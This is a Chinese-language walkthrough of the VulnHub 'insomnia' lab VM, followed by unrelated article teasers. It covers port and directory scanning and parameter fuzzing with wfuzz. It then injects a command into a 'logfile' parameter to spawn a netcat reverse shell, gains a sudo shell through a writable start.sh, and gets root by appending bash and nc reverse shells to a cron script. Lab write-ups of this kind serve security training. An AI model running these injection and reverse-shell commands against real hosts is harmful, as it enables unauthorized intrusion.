VulnHub:insomnia

靶机下载地址

信息收集

主机发现和端口扫描

攻击机网段192.168.31.0/24。

# 主机发现
nmap 192.168.31.0/24 -Pn -T4
# 靶机ip:192.168.31.207 端口扫描
nmap 192.168.31.207 -A -p- -T4

经过nmap扫描发现目标主机有http服务,端口是8080。

目录扫描

访问http服务(注意添加端口8080再访问)。

首页访问首先弹出弹窗,输入框默认值是guest,多次尝试后发现这个nickname没什么影响,直接默认值访问。

进入首页后是一个类似于留言框的东西,但是下面的输入框没有提交按钮无法提交。

F12检查页面,在<head>中发现一些js文件和代码。

看过js代码后没什么发现,主要内容是弹窗和对用户输入框内容最大接收长度的。代码过长没啥重要内容就不展示全部。

        // ask user for name with popup prompt    var name = prompt("Enter your nickname:", "guest");// default name is 'Guest'if (!name || name === ' ') {name = "guest";	}// strip tagsname = name.replace(/(<([^>]+)>)/ig,"");// display name on page$("#name-area").html("You are: <span>" + name + "</span>");

访问chat.js看看代码,写了几个函数,看过函数内容后发现都与process.php有关。

访问/process.php。空数组?没有线索。

卡住了,还是使用工具进行目录扫描,想办法在其他目录找到线索。

dirsearch -u http://192.168.31.170:8080 -i 200,301

扫出新路径/administration.php和/start.sh。

访问/start.sh,文件内容如下:

php -S 0.0.0.0:8080

访问/administration.php。页面文字翻译是:你不被允许查看,并且你的行为被记录了。这里应该是可以进行命令执行的,但是缺少参数。

遍历枚举参数

使用wfuzz工具枚举/administration.php的参数。wfuzz一般用于请求参数参数类的模糊测试也可以用来做目录扫描、http请求方法测试等操作。WFUZZ使用教程-CSDN博客

wfuzz -c -u http://192.168.31.170:8080/administration.php?FUZZ=1 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt --hh 65
  • -c:带颜色输出

  • -u:指定url

  • -w:指定字典

  • --h:隐藏字符为65的响应

补充:wfuzz自带的字典不够强大,爆不出来就换字典,这里用的是seclists字典(含有渗透测试可能用到的字典),有些kali版本默认是没有安装该字典的,安装即可sudo apt install seclists。安装完成后,字典位置是/usr/share/seclists/。

getshell

枚举出参数logfile,试一下命令执行看看有没有回显命令执行结果。

无回显,命令应该是执行了的,尝试反弹shell。

?logfile=whoami;nc -e /bin/bash 192.168.31.218 6666
nc -lvvp 6666
python3 -c 'import pty;pty.spawn("/bin/bash")'

getshell。当前权限低且经过信息收集没有找到flag和有用信息,在家目录发现存在用户julia,想办法拿到julia的shell进一步渗透。

sudo提权

sudo -l   根据命令结果发现/var/www/html/start.sh可以用于提权到julia用户。再看看start.sh的权限,有编辑权限,就可以向start.sh写入/bin/bash,执行start.sh时即可拿到julia的shell。

echo '/bin/bash' >> start.sh

sudo -u julia /bin/bash /var/www/html/start.sh

信息收集,找到user.txt。

Cronjobs提权

在定时任务中找到可以用于提权的脚本/var/cron/check.sh。并且该脚本每时每刻都会运行,检查该脚本权限,有编辑权限,向该脚本追加反弹shell即可拿到root shell。

有很多反弹shell的方式。

# 1
echo 'bash -i >& /dev/tcp/192.168.31.218/8888 0>&1' >> /var/cron/check.sh
​
# 2
echo "nc 192.168.31.218 8888 -e /bin/bash" >> /var/cron/check.sh

找到root flag🎆

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/bicheng/48750.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

【SD】深入理解Stable Diffusion与ComfyUI的使用

【SD】深入理解Stable Diffusion与ComfyUI的使用 1. Stable Diffusion&#xff08;SD&#xff09;原理概述2. 各部件详解3. SD的工作流程4. ComfyUI与SD的结合5. 总结 1. Stable Diffusion&#xff08;SD&#xff09;原理概述 整体结构&#xff1a;SD不是单一模型&#xff0c;…

[计网04] 传输层和应用层 笔记 总结 万字详解

目录 传输层概述和功能 URL 和URI 端口号划分 套接字Socket UDP&#xff08;User Datagram Protocol&#xff09; UDP首部 UDP伪首部 TCP 三报文握手和四报文挥手 TCP&#xff08;Transmission Control Protocol&#xff09; TCP首部报文格式 TCP流量控制 cwnd&…

C语言 | Leetcode C语言题解之第273题整数转换英文表示

题目&#xff1a; 题解&#xff1a; char* singles[] {"", "One ","Two ","Three ","Four ","Five ","Six ","Seven ","Eight ","Nine "}; char* teens[] {"Ten…

【网络】socket套接字基础知识

> 作者&#xff1a;დ旧言~ > 座右铭&#xff1a;松树千年终是朽&#xff0c;槿花一日自为荣。 > 目标&#xff1a;理解并掌握socket套接字。 > 毒鸡汤&#xff1a;有些事情&#xff0c;总是不明白&#xff0c;所以我不会坚持。早安! > 专栏选自&#xff1a;网络…

QT样式美化 之 qss入门

样例一 *{font-size:13px;color:white;font-family:"宋体"; }CallWidget QLineEdit#telEdt {font-size:24px;}QMainWindow,QDialog{background: qlineargradient(x1: 0, y1: 0, x2: 0, y2: 1,stop: 0 #1B2534, stop: 0.4 #010101,stop: 0.5 #000101, stop: 1.0 #1F2B…

英福康INFICON Transpector CIS2介绍PPT

英福康INFICON Transpector CIS2介绍PPT

opencv,连续拍摄多张图像求平均值减少噪点

对于照度低或者相机质量差造成的密集的随机小噪点&#xff0c;可以通过拍摄多张图像求平均值的方法来减少噪点&#xff0c;获得较为清晰的画面。 import cv2 import numpy as npclass FilterCamera:def __init__(self, cap, in_frame, num):self.cap cap # 定义的相机self.n…

使用dock构建基于lnmp的WrodPress

项目要求&#xff1a; 1.创建nginx容器环境 上传nginx.conf文件、上传阿里云镜像、上传html目录 2.准备mysql cd /opt mkdir mysql 上传my.conf文件、上传阿里云镜像、写好的Dockfile文件 3.准备php cd /opt mkdir php 上传所需文件&#xff1a; 构建各镜像&#xff1a; …

【深度学习】起源:人脑的神经结构

文章目录 睁眼看世界&#xff0c;倾耳听人间脑子&#xff0c;是个好东西&#xff01;眼睛成像其它身体感触系统脑子&#xff1a;我很忙的&#xff01;脑细胞&#xff1a;脑子里的打工人生物神经元——结构生物神经元——人脑的运算单位 人脑的深度学习总结 睁眼看世界&#xff…

RHCE(免密登录+web服务器)之小试牛刀

1、配置linux客户端免密登录服务端linux主机的root用户 2、配置web服务器&#xff0c;当访问网站www.haha.com时显示&#xff1a;haha 3、配置web服务器&#xff0c;当访问网站www.xixi.com/secret/显示&#xff1a;this is secret 本实验使用RHEL9.3和Rocky linux8操作系统 RH…

【Linux 15】进程间通信的方式 - 管道

文章目录 &#x1f308; 一、管道介绍&#x1f308; 二、匿名管道⭐ 1. 匿名管道的概念⭐ 2. 匿名管道的创建⭐ 3. 匿名管道的本质⭐ 4. 匿名管道的使用⭐ 5. 匿名管道的特点⭐ 6. 匿名管道的大小 &#x1f308; 三、命名管道⭐ 1. 命名管道的概念⭐ 2. 命名管道的创建⭐ 3. 命…

通讯录管理系统(C语言)

需求及功能分析 本系统主要划分为8个子系统&#xff0c;如下图所示。 增加联系人模块删除联系人模块查找联系人模块插入联系人模块保存联系人模块加载联系人模块显示联系人模块退出模块 具体代码 #include <stdio.h> #include <string.h> #include <stdlib…

前端八股文 $set

为什么会有$set vue2中对数组中新增的属性是监听不到的 如图 vue 插件中有但是 视图中没有刷新 解决方法 解决就是 $set() 就是在数组中新增属性的时候可以重新渲染视图 具体的写法 写法 就是 第一个 是在那个对象上新增 第二个参数 是新增的属性 第三个参数是 新增的属性…

R语言画散点图-饼图-折线图-柱状图-箱线图-等高线图-曲线图-热力图-雷达图-韦恩图(三D)

R语言画散点图-饼图-折线图-柱状图-箱线图-等高线图-曲线图-热力图-雷达图-韦恩图&#xff08;三D&#xff09; 散点图使用 plotly 包示例解析效果 使用 scatterplot3d 包示例解析效果 饼图使用 plotly 包示例解析效果 使用 plotrix 包示例解析效果 折线图使用 plotly 包示例解…

在STM32嵌入式中C/C++语言对栈空间的使用

像STM32这样的微控制器在进入main函数之前需要对栈进行初始化。可以说栈是C语言运行时的必要条件。我们知道栈实际上是一块内存空间&#xff0c;那么这块空间都用来存储什么呢&#xff1f;有什么办法能够优化栈空间的使用&#xff1f; 栈空间保存的内容 栈是一个先入后出的数据…

mac无法清空废纸篓怎么办 mac废纸篓清空了如何找回 cleanmymac误删文件怎么恢复

废纸篓相当于“一颗后悔药”&#xff0c;用于临时存储用户删除的文件。我们从从Mac上删除的文件&#xff0c;一般会进入废纸篓中。如果我们后悔了&#xff0c;可以从废纸篓中找回来。然而&#xff0c;有时我们会发现mac无法清空废纸篓&#xff0c;这是怎么回事?本文将探讨一些…

【数据结构初阶】顺序表

hi&#xff0c;我们又见面啦&#xff01;happy~~~ 目录 前言&#xff1a; 一、线性表 二、顺序表 1、概念 2、与数组的区别 3、分类 4、动态顺序表的实现 SeqList.h 见下 SeqList.c 见下 test.c 见下 【注意】 ————————————— 致回不去的童年 ———…

前端调试技巧:动态高亮渲染区域

效果&#xff1a; 前端界面的渲染过程、次数&#xff0c;会通过高亮变化来显示&#xff0c;通过这种效果排除一些BUG 高亮 打开方式 F12进入后点击ESC&#xff0c;进入rendering&#xff0c;选择前三个即可&#xff08;如果没有rendering&#xff0c;点击橘色部分勾选上&…

swiftui使用ScrollView实现左右滑动和上下滑动的效果,仿小红书页面

实现的效果如果所示&#xff0c;顶部的关注用户列表可以左右滑动&#xff0c;中间的内容区域是可以上下滚动的效果&#xff0c;点击顶部的toolbar也可以切换关注/发现/附近不同页面&#xff0c;实现翻页效果。 首页布局 这里使用了NavigationStack组件和tabViewStyle样式配置…

zerotier安装后设备在线,两个设备无法ping通

来源 组 NAS&#xff0c; 软路由&#xff0c;内网穿透&#xff0c;远程访问&#xff0c;安装了 zerotier&#xff0c;无法ping通 方法 修改windows防火墙&#xff0c;Configure the Windows firewall to allow pings。 Search for and open Windows Firewall.Select Advance…